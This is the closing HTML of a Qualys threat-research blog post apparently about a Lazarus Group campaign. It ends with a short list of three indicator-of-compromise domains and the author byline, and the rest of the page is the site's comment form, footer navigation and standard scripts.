class="wp-block-heading">Domains</h2> <p>markettrendingcenter.com</p> <p>lm-career.com</p> <p>advantims.com</p> <div id='jp-relatedposts' class='jp-relatedposts' > <h3 class="jp-relatedposts-headline"><em>Related</em></h3> </div> </div> </div> <footer class="entry-footer"> <div class='q-single-post__footer-content'> <div class='q-single-post__footer-author'> <div class='q-post__entry-avatar'> <img src='https://secure.gravatar.com/avatar/a5da0efab1b59e29fb9828966a05e5a0?s=180&d=mm&r=g' width='90' alt='Akshat Pradhan' /> </div> <div class='q-post__entry-author'> <div class='q-post__entry-writtenby'>Written by</div> <span class="byline"> <span class="author vcard"><a class="url fn n" href="https://blog.qualys.com/author/apradhan">Akshat Pradhan</a></span>, Senior Engineer, Threat Research, Qualys</span> <div class='q-post__entry-author-email'>Write to Akshat at <a href='mailto:apradhan@qualys.com'>apradhan@qualys.com</a></div> </div> </div> <div class='q-single-post__footer-actions'> <div class='q-single-post__action'><label>Like</label><div class='likebutton likebutton_json' data-postid='29363' data-style='style2'></div></div> <div class="q-single-post__action"><label>Share</label><div class="ShariffSC" style="border-top: 1px solid #ddd; border-top: 1px solid rgba(0,0,0,.2); padding-top: 2em;"><div class="shariff shariff-align-flex-start shariff-widget-align-flex-start" style="display:none"><ul class="shariff-buttons theme-round orientation-horizontal buttonsize-medium"><li class="shariff-button linkedin" style="background-color:#97A0AF"><a href="https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fblog.qualys.com%2Fvulnerabilities-threat-research%2F2022%2F02%2F08%2Flolzarus-lazarus-group-incorporating-lolbins-into-campaigns" title="Share on LinkedIn" aria-label="Share on LinkedIn" role="button" rel="noopener nofollow" class="shariff-link" style="; background-color:#6A778B; color:#fff" target="_blank"><span class="shariff-icon" style=""><svg width="32px" 
class="comment-form" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p><p class="comment-form-comment"><label for="comment">Comment</label><textarea id="comment" name="comment" cols="45" rows="6" minlength="10" placeholder="Share your thoughts" aria-required="true" required></textarea></p><div class="field-wrapper"><p class="comment-form-author"><label for="author">Name</label><input id="author" name="author" type="text" placeholder="Name" value="" size="20" minlength="4" required /></p> <p class="comment-form-email"><label for="email">Email</label><input id="email" name="email" type="email" placeholder="Email" value="" size="30" required /></p></div> <p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p> <div class="g-recaptcha" data-sitekey="6Lc58QoqAAAAALGk25W8X6NC5w_JwiPPf_JA78rv"></div><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="POST" /> <input type='hidden' name='comment_post_ID' value='29363' id='comment_post_ID' /> <input type='hidden' name='comment_parent' id='comment_parent' value='0' /> </p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="db27863e1c" /></p><input type="hidden" id="ct_checkjs_06138bc5af6023646ede0e1f7c1eac75" name="ct_checkjs" value="0" /><script>setTimeout(function(){var ct_input_name = "ct_checkjs_06138bc5af6023646ede0e1f7c1eac75";if (document.getElementById(ct_input_name) !== null) {var ct_input_value = document.getElementById(ct_input_name).value;document.getElementById(ct_input_name).value = 
document.getElementById(ct_input_name).value.replace(ct_input_value, '366396619');}}, 1000);</script><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="32"/><script>document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div><!-- #respond --> </div><!-- #comments --> </main><!-- #main --> </div><!-- .q-main_content-container --> </div><!-- #page --> <footer id="colophon" class="site-footer q-footer"> <div class="q-footer__container"> <div class="q-footer__row"> <div class="q-footer__column--wide q-footer__column--desktop"> <h2 class="q-footer__heading"> Join the <span class="nowrap">discussion today!</span> </h2> <p class="q-footer__copy"> <strong>Learn</strong> more about Qualys and industry best practices. </p> <p class="q-footer__copy"> <strong>Share</strong> what you know and build a reputation. </p> <p class="q-footer__copy"> <strong>Secure</strong> your systems and improve security for everyone. 
</p> <div class="q-footer__search"> <span class="q-button__start-a-discussion q-button__light-blue q-button-with-arrow"> <a href="https://discussions.qualys.com/discussion/create!input.jspa"> <span>Start a discussion</span> </a> </span> </div> <div class="q-footer__social"> <ul id="social-menu" class="q-social-list"><li id="menu-item-26477" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26477"><a target="_blank" rel="noopener" href="https://twitter.com/qualys"><svg class="q-social-list__icon" role="img" aria-label="Qualys on Twitter" width="20" height="20" xmlns="http://www.w3.org/2000/svg" viewBox="0 148.7 610.7 496.3" enable-background="new 0 148.7 610.7 496.3"><title>Twitter</title><path fill="#FFF" d="M192.1 645c-70.8 0-136.7-20.7-192.1-56.2 9.8 1.1 19.9 1.8 29.9 1.8 58.7 0 112.8-20.1 155.7-53.6-54.7-1.1-101.2-37.3-117-87.1 7.6 1.6 15.4 2.2 23.7 2.2 11.4 0 22.6-1.6 33.1-4.5-57.5-11.6-100.6-62.1-100.6-122.9v-1.6c17 9.4 36.2 15 56.7 15.6-33.5-22.4-55.8-60.6-55.8-104.2 0-23 6.3-44.4 17-63 61.6 75.9 153.9 126 258 131.1-2.2-9.2-3.4-18.8-3.4-28.6 0-69.2 56.1-125.3 125.3-125.3 36 0 68.6 15.2 91.4 39.5 28.8-5.6 55.6-15.9 79.7-30.4-9.4 29.3-29 53.8-54.9 69.5 25.2-3.1 49.6-9.8 71.9-19.7-16.8 25-38 47.1-62.5 64.8.2 5.4.4 10.7.4 16.3 0 165.4-126.2 356.3-356.5 356.3"></path></svg></a></li> <li id="menu-item-26478" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26478"><a target="_blank" rel="noopener" href="https://www.linkedin.com/company/qualys"><svg class="q-social-list__icon" role="img" aria-label="Qualys on LinkedIn" width="16" height="16" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36" enable-background="new 0 0 36 36"><title>LinkedIn</title><path fill="#FFF" d="M33.3 0h-30.6c-1.5 0-2.7 1.2-2.7 2.6v30.8c0 1.4 1.2 2.6 2.7 2.6h30.7c1.5 0 2.7-1.2 2.7-2.6v-30.8c-.1-1.4-1.3-2.6-2.8-2.6zm-22.6 30.7h-5.4v-17.2h5.3v17.2zm-2.7-19.6c-1.7 0-3.1-1.4-3.1-3.1 0-1.7 1.4-3 3.1-3 1.7 0 3.1 1.4 3.1 3.1 0 1.7-1.4 3-3.1 3zm22.7 
19.6h-5.3v-8.4c0-2 0-4.6-2.8-4.6s-3.2 2.2-3.2 4.4v8.5h-5.4v-17.1h5.1v2.3h.1c.7-1.4 2.5-2.8 5.1-2.8 5.4 0 6.4 3.6 6.4 8.2v9.5z"></path></svg></a></li> <li id="menu-item-26479" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26479"><a target="_blank" rel="noopener" href="https://www.facebook.com/qualys"><svg class="q-social-list__icon" role="img" aria-label="Qualys on Facebook" width="16" height="16" xmlns="http://www.w3.org/2000/svg" viewBox="0 90 611.8 612.2" enable-background="new 0 90 611.8 612.2"><title>Facebook</title><path fill="#FFF" d="M578.3 90h-544.6c-18.6 0-33.7 15.1-33.7 33.7v544.4c0 18.6 15.1 33.7 33.7 33.7h293v-236.9h-79.7v-92.4h79.8v-67.9c0-79.1 48.4-122 118.8-122 33.7 0 62.8 2.5 71.3 3.7v82.5h-48.9c-38.3 0-45.9 18.1-45.9 44.9v58.9h91.5l-11.9 92.4h-79.6v237.1h155.9c18.6 0 33.7-15.1 33.7-33.7v-544.7c.3-18.6-14.8-33.7-33.4-33.7z"></path></svg></a></li> <li id="menu-item-26480" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26480"><a target="_blank" rel="noopener" href="https://www.youtube.com/user/QualysGuard"><svg class="q-social-list__icon" role="img" aria-label="Qualys on YouTube" width="22" height="22" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 1021.5 718.4" enable-background="new 0 0 1021.5 718.4"><title>YouTube</title><path fill="#E0E0E0" d="M647.3 366.3l-242.1-161.6 276 144-33.9 17.6"></path><path fill="#FFF" d="M1011.2 155s-10-70.4-40.6-101.4c-38.8-40.7-82.4-40.9-102.3-43.3-142.9-10.3-357.4-10.3-357.4-10.3h-.4s-214.4 0-357.4 10.3c-20 2.4-63.5 2.6-102.3 43.3-30.6 31-40.6 101.4-40.6 101.4s-10.2 82.6-10.2 165.3v77.5c0 82.7 10.2 165.3 10.2 165.3s10 70.4 40.6 101.4c38.9 40.7 89.9 39.4 112.6 43.7 81.7 7.8 347.3 10.3 347.3 10.3s214.6-.3 357.6-10.7c20-2.4 63.5-2.6 102.3-43.3 30.6-31 40.6-101.4 40.6-101.4s10.2-82.7 10.2-165.3v-77.5c.1-82.7-10.2-165.3-10.2-165.3m-605.9 336.7v-287l276 144-276 143z"></path></svg></a></li> <li id="menu-item-26481" 
class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26481"><a target="_blank" rel="noopener" href="https://vimeo.com/qualys"><svg class="q-social-list__icon" role="img" aria-label="Qualys on Vimeo" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 86.67"><title>Vimeo</title><path fill="#FFF" d="M100 20.05q-.72 14.63-20.44 40.06Q59.16 86.67 45 86.67q-8.74 0-14.79-16.17l-8.02-29.66q-4.49-16.17-9.64-16.18-1.12 0-7.85 4.72L0 23.31q7.4-6.52 14.59-13 9.87-8.55 14.82-9 11.67-1.12 14.37 16 2.91 18.47 4 23 3.36 15.32 7.41 15.31 3.14 0 9.43-9.94t6.73-15.13q.9-8.58-6.73-8.58a18.7 18.7 0 0 0-7.4 1.64Q64.63-.66 85.42 0 100.84.47 100 20.05z"></path></svg></a></li> </ul> </div> </div> <div class="q-footer__column q-footer__column--nav"> <section id="nav_menu-2" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Qualys</h3><div class="menu-footer-qualys-container"><ul id="menu-footer-qualys" class="menu"><li id="menu-item-26499" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26499"><a title="Information Security and Compliance | Qualys, Inc." href="https://www.qualys.com/">Qualys.com</a></li> <li id="menu-item-26500" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26500"><a title="Free Trial | Qualys, Inc." 
href="https://www.qualys.com/community-edition/">Qualys Community Edition</a></li> <li id="menu-item-26565" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26565"><a href="https://store.qualys.com/">Qualys Merchandise Store</a></li> </ul></div></section><section id="nav_menu-3" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Qualys Communities</h3><div class="menu-footer-qualys-communities-container"><ul id="menu-footer-qualys-communities" class="menu"><li id="menu-item-26501" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26501"><a href="https://community.qualys.com/vulnerability-management/">Vulnerability Management</a></li> <li id="menu-item-26502" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26502"><a href="https://community.qualys.com/policy-compliance/">Policy Compliance</a></li> <li id="menu-item-26503" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26503"><a href="https://community.qualys.com/pci-compliance/">PCI Compliance</a></li> <li id="menu-item-26504" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26504"><a href="https://community.qualys.com/web-app-scanning/">Web App Scanning</a></li> <li id="menu-item-26505" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26505"><a href="https://community.qualys.com/web-app-firewall/">Web App Firewall</a></li> <li id="menu-item-26506" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26506"><a href="https://community.qualys.com/continuous-monitoring/">Continuous Monitoring</a></li> <li id="menu-item-26507" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26507"><a href="https://community.qualys.com/security-assessment-questionnaire/">Security Assessment Questionnaire</a></li> <li id="menu-item-26508" class="menu-item menu-item-type-custom menu-item-object-custom 
menu-item-26508"><a href="https://community.qualys.com/threat-protection/">Threat Protection</a></li> <li id="menu-item-26509" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26509"><a href="https://community.qualys.com/asset-inventory/">Asset Inventory</a></li> <li id="menu-item-26510" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26510"><a href="https://community.qualys.com/asset-view/">AssetView</a></li> <li id="menu-item-26511" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26511"><a href="https://community.qualys.com/cmdb-sync/">CMDB Sync</a></li> <li id="menu-item-26512" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26512"><a href="https://community.qualys.com/endpoint-detection-response/">Endpoint Detection & Response</a></li> <li id="menu-item-26513" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26513"><a href="https://community.qualys.com/security-configuration-assessment/">Security Configuration Assessment</a></li> <li id="menu-item-26514" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26514"><a href="https://community.qualys.com/file-integrity-monitoring/">File Integrity Monitoring</a></li> <li id="menu-item-26515" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26515"><a href="https://community.qualys.com/cloud-inventory/">Cloud Inventory</a></li> <li id="menu-item-26516" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26516"><a href="https://community.qualys.com/certificate-inventory/">Certificate Inventory</a></li> <li id="menu-item-26517" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26517"><a href="https://community.qualys.com/container-security/">Container Security</a></li> <li id="menu-item-26518" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26518"><a 
href="https://community.qualys.com/cloud-security-assessment/">Cloud Security Assessment</a></li> <li id="menu-item-26519" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26519"><a href="https://community.qualys.com/certificate-assessment/">Certificate Assessment</a></li> <li id="menu-item-26520" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26520"><a href="https://community.qualys.com/out-of-band-configuration-assessment/">Out-of-band Configuration Assessment</a></li> <li id="menu-item-26521" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26521"><a href="https://community.qualys.com/patch-management/">Patch Management</a></li> <li id="menu-item-26522" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26522"><a href="https://community.qualys.com/api/">Developer API</a></li> <li id="menu-item-26523" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26523"><a href="https://community.qualys.com/cloud-agent/">Cloud Agent</a></li> <li id="menu-item-26524" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26524"><a href="https://community.qualys.com/reporting/">Dashboards & Reporting</a></li> </ul></div></section><section id="nav_menu-4" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Discussions</h3><div class="menu-footer-discussions-container"><ul id="menu-footer-discussions" class="menu"><li id="menu-item-26489" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26489"><a href="https://discussions.qualys.com/">All discussions</a></li> <li id="menu-item-26490" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26490"><a href="https://discussions.qualys.com/community/asset-inventory">Global IT Asset Management</a></li> <li id="menu-item-26491" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26491"><a 
href="https://discussions.qualys.com/community/vulnerability-management">IT Security</a></li> <li id="menu-item-26492" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26492"><a href="https://discussions.qualys.com/community/policy-compliance">Compliance</a></li> <li id="menu-item-26493" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26493"><a href="https://discussions.qualys.com/community/cloud-security">Cloud & Container Security</a></li> <li id="menu-item-26494" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26494"><a href="https://discussions.qualys.com/community/web-application-scanning">Web App Security</a></li> <li id="menu-item-26495" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26495"><a href="https://discussions.qualys.com/community/ssllabs">Certificate Security & SSL Labs</a></li> <li id="menu-item-26496" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26496"><a href="https://discussions.qualys.com/community/developer">Developer API</a></li> </ul></div></section><section id="nav_menu-5" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Blog</h3><div class="menu-footer-blog-container"><ul id="menu-footer-blog" class="menu"><li id="menu-item-26483" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-26483"><a href="https://blog.qualys.com/">All posts</a></li> <li id="menu-item-26484" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26484"><a href="https://blog.qualys.com/qualys-insights">Qualys Insights</a></li> <li id="menu-item-26485" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26485"><a href="https://blog.qualys.com/product-tech">Product and Tech</a></li> <li id="menu-item-26486" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26486"><a 
href="https://blog.qualys.com/vulnerabilities-threat-research">Vulnerabilities and Threat Research</a></li> <li id="menu-item-26487" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26487"><a href="https://notifications.qualys.com/">Release Notifications</a></li> </ul></div></section><section id="nav_menu-6" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Training</h3><div class="menu-footer-training-container"><ul id="menu-footer-training" class="menu"><li id="menu-item-26526" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26526"><a href="https://www.qualys.com/training/">Overview</a></li> <li id="menu-item-26527" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26527"><a href="https://www.qualys.com/training/#self-paced">Certified Courses</a></li> <li id="menu-item-26528" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26528"><a href="https://www.qualys.com/training/#video-library">Video Library</a></li> <li id="menu-item-26529" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26529"><a href="https://www.qualys.com/training/#instructor-led">Instructor-led Training</a></li> </ul></div></section><section id="nav_menu-7" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title q-footer__subheading">Docs</h3><div class="menu-footer-docs-container"><ul id="menu-footer-docs" class="menu"><li id="menu-item-26497" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26497"><a href="https://www.qualys.com/documentation/">Overview</a></li> <li id="menu-item-26498" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26498"><a href="https://www.qualys.com/documentation/release-notes/">Release Notes</a></li> </ul></div></section><section id="nav_menu-8" class="widget widget_nav_menu q-footer__group"><h3 class="widget-title 
q-footer__subheading">Support</h3><div class="menu-footer-support-container"><ul id="menu-footer-support" class="menu"><li id="menu-item-26525" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-26525"><a href="https://qualys-secure.force.com/customer/s/">Support Portal</a></li> </ul></div></section> </div> </div> <div class="q-footer__row"> <small class="q-footer__copyright">© 2024 Qualys, Inc. All rights reserved. <a href="https://www.qualys.com/company/privacy/"><span style="white-space: nowrap;">Privacy Policy</span></a> . <a href="https://www.qualys.com/company/accessibility/">Accessibility</a></small> </div> </div> </footer><!-- #colophon --> <img alt="Cleantalk Pixel" title="Cleantalk Pixel" id="apbct_pixel" style="display: none;" src="https://moderate1-v4.cleantalk.org/pixel/dba09330c14be9bf43dfb2fba6d7f545.gif"><div class='q-goto-top-btn js-goto-top-single'><span><svg viewBox="0 0 16 22" xmlns="http://www.w3.org/2000/svg"><path d="m8.56934246 21.55c-.18206438.2813776-.49435704.451275-.8295.451275-.33514295 0-.64743561-.1698974-.8295-.451275l-6.771-10.808c-.387-.616.078-1.401.83-1.401h5.668l-.003-8.415c0-.51.495-.926 1.106-.926.542 0 .995.328 1.088.759l.017.167.003 8.415h5.66100004c.693 0 1.14.66.912 1.245l-.08.156zm.279-4.041 3.95800004-6.316h-3.96000004v6.316zm-2.212.004v-6.32h-3.959l3.957 6.32z" transform="matrix(1 0 0 -1 .000658 22.001274)"/></svg></span></div> <div id="jp-carousel-loading-overlay"> <div id="jp-carousel-loading-wrapper"> <span id="jp-carousel-library-loading"> </span> </div> </div> <div class="jp-carousel-overlay" style="display: none;"> <div class="jp-carousel-container"> <!-- The Carousel Swiper --> <div class="jp-carousel-wrap swiper-container jp-carousel-swiper-container jp-carousel-transitions" itemscope itemtype="https://schema.org/ImageGallery"> <div class="jp-carousel swiper-wrapper"></div> <div class="jp-swiper-button-prev swiper-button-prev"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" 
xmlns="http://www.w3.org/2000/svg"> <mask id="maskPrev" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="9" height="12"> <path d="M16.2072 16.59L11.6496 12L16.2072 7.41L14.8041 6L8.8335 12L14.8041 18L16.2072 16.59Z" fill="white"/> </mask> <g mask="url(#maskPrev)"> <rect x="0.579102" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> </div> <div class="jp-swiper-button-next swiper-button-next"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="maskNext" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="8" height="12"> <path d="M8.59814 16.59L13.1557 12L8.59814 7.41L10.0012 6L15.9718 12L10.0012 18L8.59814 16.59Z" fill="white"/> </mask> <g mask="url(#maskNext)"> <rect x="0.34375" width="23.8822" height="24" fill="#FFFFFF"/> </g> </svg> </div> </div> <!-- The main close buton --> <div class="jp-carousel-close-hint"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="maskClose" mask-type="alpha" maskUnits="userSpaceOnUse" x="5" y="5" width="15" height="14"> <path d="M19.3166 6.41L17.9135 5L12.3509 10.59L6.78834 5L5.38525 6.41L10.9478 12L5.38525 17.59L6.78834 19L12.3509 13.41L17.9135 19L19.3166 17.59L13.754 12L19.3166 6.41Z" fill="white"/> </mask> <g mask="url(#maskClose)"> <rect x="0.409668" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> </div> <!-- Image info, comments and meta --> <div class="jp-carousel-info"> <div class="jp-carousel-info-footer"> <div class="jp-carousel-pagination-container"> <div class="jp-swiper-pagination swiper-pagination"></div> <div class="jp-carousel-pagination"></div> </div> <div class="jp-carousel-photo-title-container"> <h2 class="jp-carousel-photo-caption"></h2> </div> <div class="jp-carousel-photo-icons-container"> <a href="#" class="jp-carousel-icon-btn jp-carousel-icon-info" aria-label="Toggle photo metadata visibility"> <span class="jp-carousel-icon"> <svg width="25" height="24" 
viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="maskInfo" mask-type="alpha" maskUnits="userSpaceOnUse" x="2" y="2" width="21" height="20"> <path fill-rule="evenodd" clip-rule="evenodd" d="M12.7537 2C7.26076 2 2.80273 6.48 2.80273 12C2.80273 17.52 7.26076 22 12.7537 22C18.2466 22 22.7046 17.52 22.7046 12C22.7046 6.48 18.2466 2 12.7537 2ZM11.7586 7V9H13.7488V7H11.7586ZM11.7586 11V17H13.7488V11H11.7586ZM4.79292 12C4.79292 16.41 8.36531 20 12.7537 20C17.142 20 20.7144 16.41 20.7144 12C20.7144 7.59 17.142 4 12.7537 4C8.36531 4 4.79292 7.59 4.79292 12Z" fill="white"/> </mask> <g mask="url(#maskInfo)"> <rect x="0.8125" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> </span> </a> <a href="#" class="jp-carousel-icon-btn jp-carousel-icon-comments" aria-label="Toggle photo comments visibility"> <span class="jp-carousel-icon"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="maskComments" mask-type="alpha" maskUnits="userSpaceOnUse" x="2" y="2" width="21" height="20"> <path fill-rule="evenodd" clip-rule="evenodd" d="M4.3271 2H20.2486C21.3432 2 22.2388 2.9 22.2388 4V16C22.2388 17.1 21.3432 18 20.2486 18H6.31729L2.33691 22V4C2.33691 2.9 3.2325 2 4.3271 2ZM6.31729 16H20.2486V4H4.3271V18L6.31729 16Z" fill="white"/> </mask> <g mask="url(#maskComments)"> <rect x="0.34668" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> <span class="jp-carousel-has-comments-indicator" aria-label="This image has comments."></span> </span> </a> </div> </div> <div class="jp-carousel-info-extra"> <div class="jp-carousel-info-content-wrapper"> <div class="jp-carousel-photo-title-container"> <h2 class="jp-carousel-photo-title"></h2> </div> <div class="jp-carousel-comments-wrapper"> <div id="jp-carousel-comments-loading"> <span>Loading Comments...</span> </div> <div class="jp-carousel-comments"></div> <div id="jp-carousel-comment-form-container"> <span id="jp-carousel-comment-form-spinner"> </span> <div 
id="jp-carousel-comment-post-results"></div> <form id="jp-carousel-comment-form"> <label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label> <textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..." ></textarea> <div id="jp-carousel-comment-form-submit-and-info-wrapper"> <div id="jp-carousel-comment-form-commenting-as"> <fieldset> <label for="jp-carousel-comment-form-email-field">Email (Required)</label> <input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field" /> </fieldset> <fieldset> <label for="jp-carousel-comment-form-author-field">Name (Required)</label> <input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field" /> </fieldset> <fieldset> <label for="jp-carousel-comment-form-url-field">Website</label> <input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field" /> </fieldset> </div> <input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment" /> </div> </form> </div> </div> <div class="jp-carousel-image-meta"> <div class="jp-carousel-title-and-caption"> <div class="jp-carousel-photo-info"> <h3 class="jp-carousel-caption" itemprop="caption description"></h3> </div> <div class="jp-carousel-photo-description"></div> </div> <ul class="jp-carousel-image-exif" style="display: none;"></ul> <a class="jp-carousel-image-download" href="#" target="_blank" style="display: none;"> <svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="3" y="3" width="19" height="18"> 
<path fill-rule="evenodd" clip-rule="evenodd" d="M5.84615 5V19H19.7775V12H21.7677V19C21.7677 20.1 20.8721 21 19.7775 21H5.84615C4.74159 21 3.85596 20.1 3.85596 19V5C3.85596 3.9 4.74159 3 5.84615 3H12.8118V5H5.84615ZM14.802 5V3H21.7677V10H19.7775V6.41L9.99569 16.24L8.59261 14.83L18.3744 5H14.802Z" fill="white"/> </mask> <g mask="url(#mask0)"> <rect x="0.870605" width="23.8823" height="24" fill="#FFFFFF"/> </g> </svg> <span class="jp-carousel-download-text"></span> </a> <div class="jp-carousel-image-map" style="display: none;"></div> </div> </div> </div> </div> </div> </div> <link rel='stylesheet' id='jetpack-carousel-swiper-css-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/modules/carousel/swiper-bundle.css?ver=13.9.1' media='all' /> <link rel='stylesheet' id='jetpack-carousel-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel.css?ver=13.9.1' media='all' /> <link rel='stylesheet' id='shariffcss-css' href='https://ik.imagekit.io/qualys/wp-content/plugins/shariff/css/shariff.min.css?ver=4.6.14' media='all' /> <style id='core-block-supports-inline-css'> .wp-container-core-columns-is-layout-1{flex-wrap:nowrap;}.wp-container-core-columns-is-layout-2{flex-wrap:nowrap;}.wp-container-core-columns-is-layout-3{flex-wrap:nowrap;}.wp-container-core-columns-is-layout-4{flex-wrap:nowrap;} </style> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-migrate/3.3.2/jquery-migrate.min.js" id="jquery-migrate-js" integrity='sha512-3fMsI1vtU2e/tVxZORSEeuMhXnT9By80xlmXlsOku7hNwZSHJjwcOBpmy+uu+fyWwGCLkMvdVbHkeoXdAzBv+w==' crossorigin='anonymous' referrerpolicy='no-referrer'></script> <script src="https://ik.imagekit.io/qualys/wp-includes/js/underscore.min.js?ver=1.13.4" id="underscore-js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/highlight.min.js" id="qualys2020-highlightjs-js"></script> <script 
src="https://cdnjs.cloudflare.com/ajax/libs/waypoints/4.0.1/noframework.waypoints.min.js" id="waypoint-js"></script> <script id="qualys2020-script-js-extra"> var qualys2020Script = {"ajaxurl":"https:\/\/blog.qualys.com\/wp-admin\/admin-ajax.php","current_page":"0","max_page":"0","archive_type":"all","content_id":"29363"}; </script> <script src="https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/script/script.js?ver=1.0.3" id="qualys2020-script-js"></script> <script src="https://www.google.com/recaptcha/api.js" id="recaptcha-js"></script> <script src="https://ik.imagekit.io/qualys/wp-includes/js/comment-reply.min.js?ver=6.6.2" id="comment-reply-js" async data-wp-strategy="async"></script> <script src="https://static.cloud.coveo.com/searchui/v2.10085/2/js/CoveoJsSearch.Lazy.min.js" id="coveo-script-js" integrity='sha512-vueueBf3ND6Jj5E31AIFE28WnA2gQaGt3jHb+Wx5c0bDFBiKgQ8in3T9L4nVHC02v1uEgsrD4vL6pgYUGwZ3Kw==' crossorigin='anonymous'></script> <script src="https://ik.imagekit.io/qualys/wp-content/themes/qualys2020/script/coveo.js" id="q-script-coveo-js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js" id="fancybox-script-js"></script> <script src="https://stats.wp.com/e-202447.js" id="jetpack-stats-js" data-wp-strategy="defer"></script> <script 